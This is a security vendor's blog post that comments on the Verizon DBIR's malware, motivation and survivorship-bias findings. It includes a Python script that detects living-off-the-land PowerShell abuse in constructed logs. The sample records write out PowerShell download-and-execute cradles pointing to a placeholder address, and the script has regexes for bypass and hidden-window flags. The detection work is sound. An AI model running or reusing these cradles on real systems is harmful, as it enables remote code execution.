Threat Intelligence

Chad Loeven

Decoding the Verizon DBIR Report: An Insider's Look Beyond the Headlines

To truly understand cybersecurity trends, we must look beyond the headlines and ask more of the data. What you learn might surprise you.

For the past 13 years, Verizon's "Data Breach Investigations Report" (DBIR) has been the industry's definitive resource for documenting and benchmarking the global state of cybersecurity. As always, the Verizon DBIR team does an admirable job of sifting through an impressively large data set to tease out the underlying trends that are shaping the threat landscape.

But as Miles Davis, the legendary jazz trumpeter, once famously said, "It's not the notes you play, it's the notes you don't play." In other words, it's the silence between the notes that enables the listener to interpret and appreciate the music's deeper meaning and context. When reading a broad industry survey such as the DBIR, it is likewise instructive to look beyond the bolded headlines and ask further questions of the data to best understand the meaning behind these trends.

Here's what I mean.

Headline #1: The Global Malware Threat Is Evaporating
According to DBIR: The Verizon DBIR team documents a precipitous decline in the share of breaches involving malware, from 50% in 2016 to just 6%, stating that "we think that other attack types such as hacking and social breaches benefit from the theft of credentials, which makes it no longer necessary to add malware in order to maintain persistence. So while we definitely cannot assert that malware has gone the way of the eight-track tape, it is a tool that sits idle in the attacker's toolbox in simpler attack scenarios."

Beyond the headline: Of course, it's heartening to read that malware threats are waning, and I agree with the interpretation that the broad availability of user credentials has, to a great extent, obviated the need for threat actors to employ malware to maintain persistence. Why bother climbing through a small basement window if you can just open the front door, right?

However, despite this downward trend, few threat researchers I know would take comfort in this pronouncement alone, nor would they presume that malware is a threat they no longer need to worry about. Part of the decline is better explained by the commoditization of attack tooling: capabilities that were once the province of a sophisticated few are now sold to a much larger population as easy-to-use subscription services, and, consistent with the credential-driven attacks the DBIR itself cites, many of those services compromise a network without needing advanced malware at all. It also helps that the industry as a whole has collectively improved its ability to detect and block malware.

Another force behind the decline is that threat actors rely less on malware as a blunt instrument to gain entry and more on legitimate system utilities and tools repurposed for malicious ends. This is best exemplified by the rise of "living-off-the-land binaries" (LOLBins). Typically, an attacker abuses a trusted, vendor-signed application such as PowerShell to run malicious scripts, often straight from memory, so that no new executable is written to disk for conventional antivirus tools to inspect.
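As an added illustration (not code from the article or from VMRay), here is a small detection pass over constructed process-creation log records that flags the PowerShell abuse pattern just described. It decodes an -EncodedCommand argument (PowerShell expects base64 of UTF-16LE text), looks for download-cradle, hidden-window and policy-bypass indicators in both the raw and the decoded command line, weights an Office application as the parent process, and suppresses single-indicator noise such as a lone -NoProfile. The pipe-delimited log format, the sample records and the 203.0.113.5 address are all constructed for the example.

```python
"""Flag living-off-the-land PowerShell abuse in process-creation logs.

Added example, not code from the article or from VMRay. The log format and
sample records are constructed; 203.0.113.5 is a documentation-range address.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Indicators checked against the raw command line plus any decoded payload.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
}
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
MIN_SCORE = 2  # a lone -NoProfile in an admin script is not worth an alert


@dataclass
class Finding:
    timestamp: str
    indicators: List[str]
    decoded: Optional[str]
    score: int


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(line: str) -> Optional[Finding]:
    """Score one 'timestamp|parent_image|image|command_line' record."""
    ts, parent, image, cmdline = line.split("|", 3)  # maxsplit: cmdline may contain '|'
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    if parent.lower().rsplit("\\", 1)[-1] in OFFICE_PARENTS:
        hits.append("office_parent")  # Office spawning PowerShell: classic macro chain
    if len(hits) < MIN_SCORE:
        return None
    return Finding(ts, hits, decoded, len(hits))


def analyze_logs(lines) -> List[Finding]:
    return [f for f in map(analyze, lines) if f is not None]


def ps_encode(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"

# Constructed sample records (not from any real system).
SAMPLE_LOGS = [
    r"2020-06-01T09:00:01|C:\Windows\explorer.exe|" + PS
    + "|powershell.exe -NoProfile -Command Get-Service",
    r"2020-06-01T09:02:17|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|" + PS
    + "|powershell.exe -nop -w hidden -enc " + ps_encode(CRADLE),
    r"2020-06-01T09:05:40|C:\Windows\System32\cmd.exe|" + PS
    + r'|powershell.exe -ep bypass -c "iwr http://203.0.113.5/b.ps1 | iex"',
    r"2020-06-01T09:06:02|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir",
]

if __name__ == "__main__":
    for f in analyze_logs(SAMPLE_LOGS):
        print(f.timestamp, f.score, f.indicators)
        if f.decoded:
            print("  decoded:", f.decoded)
```

Running the block reports two findings: the Office-spawned, encoded download cradle (six indicators) and the plain-text bypass-and-cradle one-liner (three), while the administrator's -NoProfile Get-Service call and the cmd.exe record produce nothing. The point of decoding before matching is that the encoded record carries none of the cradle strings in its raw command line; an inspection that stops at the arguments it can see would miss it.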

Headline #2: It's Still All About the Benjamins, but ...
According to DBIR: Financial rewards remain the primary motivator for threat actors. However, DBIR authors acknowledged a "secondary" motivating factor, for which the compromised infrastructure "is not the main target, but a means to an end as part of another attack."

Beyond the headline: What the authors call secondary is a convenient way to group a wide spectrum of disparate motivations under a single umbrella. However, it also hints at another underlying trend, which is that threat actors are being both more selective at deploying malware and increasingly using evasive malware strains to conduct longer-term intelligence-gathering operations.

With respect to droppers and Trojans, the authors note that while they find these particular threats decreasing over time, "their backdoor and remote-control capabilities are still a key functionality for more advanced attackers to operate and achieve their objective." We've seen ample evidence of this in our work at VMRay analyzing a variety of banking Trojans (for example, Trickbot and Ursnif). We have seen firsthand how they are increasingly being leveraged to conduct a wide range of secondary reconnaissance, from querying the network for configuration settings, to recording what software and services are installed and running, to breaching HR and payroll systems, all of which attackers can leverage for future attacks.

This supports the case that more sophisticated attackers — be they nation-states or criminal organizations — are leveraging known malware strains and repurposing them for extended campaigns whose primary objective is to maintain persistence.

Headline #3: Reverse Survivorship Bias (aka, It's What We Aren't Seeing That Could Really Be Hurting Us)
According to DBIR: "Our incident corpus suffers from the opposite of survivorship bias. Breaches and incidents are records of when the victim didn't survive. … Malware being blocked by your protective controls is an example of survivorship bias where the potential victim didn't get the malware" … and that "it is important to acknowledge that the relative percentage of malware that we see present in breaches and incidents may not correspond to your experiences fighting, cleaning and quarantining malware throughout your own organization."

Beyond the headline: Perhaps the best-known example of survivorship bias comes from statistician Abraham Wald, who during World War II accounted for this bias when advising where bombers should be reinforced with additional armor against enemy fire. Returning planes came home riddled with bullet holes, especially in their wings. Wald's insight was that the planes that never came home were the ones that should inform the decision: the hits that brought a bomber down landed in the places where returning aircraft showed few or no holes, and those were the areas that needed the armor.

It's good to see the DBIR authors both acknowledge and highlight this issue, because even the most comprehensive datasets tell only part of the story. Blocked malware is one way a case drops out of the sample; the open question is how many malware threats never made it into the corpus not because they were blocked, but because they succeeded in evading detection altogether, so that the resulting breach was either never discovered or was never attributed to malware. It stands to reason that the malware of 2019 is significantly better at hiding its tracks than the malware of 2014.

The Verizon DBIR has become a truly invaluable resource for threat researchers and security analysts who are continuously tasked with planning for every variety of "what-if" scenario. More than anything, though, the report is a showcase of cross-industry collaboration at its finest, with growing participation from an array of diverse security vendors, government agencies, and nonprofit organizations. Regardless of what the data says about the state of the current threat environment, this type of open cooperation among even the fiercest competitors represents our best hope in keeping our future secure.

(Note: VMRay is among the report's contributing organizations.)

Chad Loeven has been involved in enterprise security for over 20 years. Prior to VMRay he managed technology alliances at RSA, the security division of EMC. He came on board RSA via its acquisition of Silicium Security and Silicium's ECAT ETDR (Endpoint Threat Detection and ...
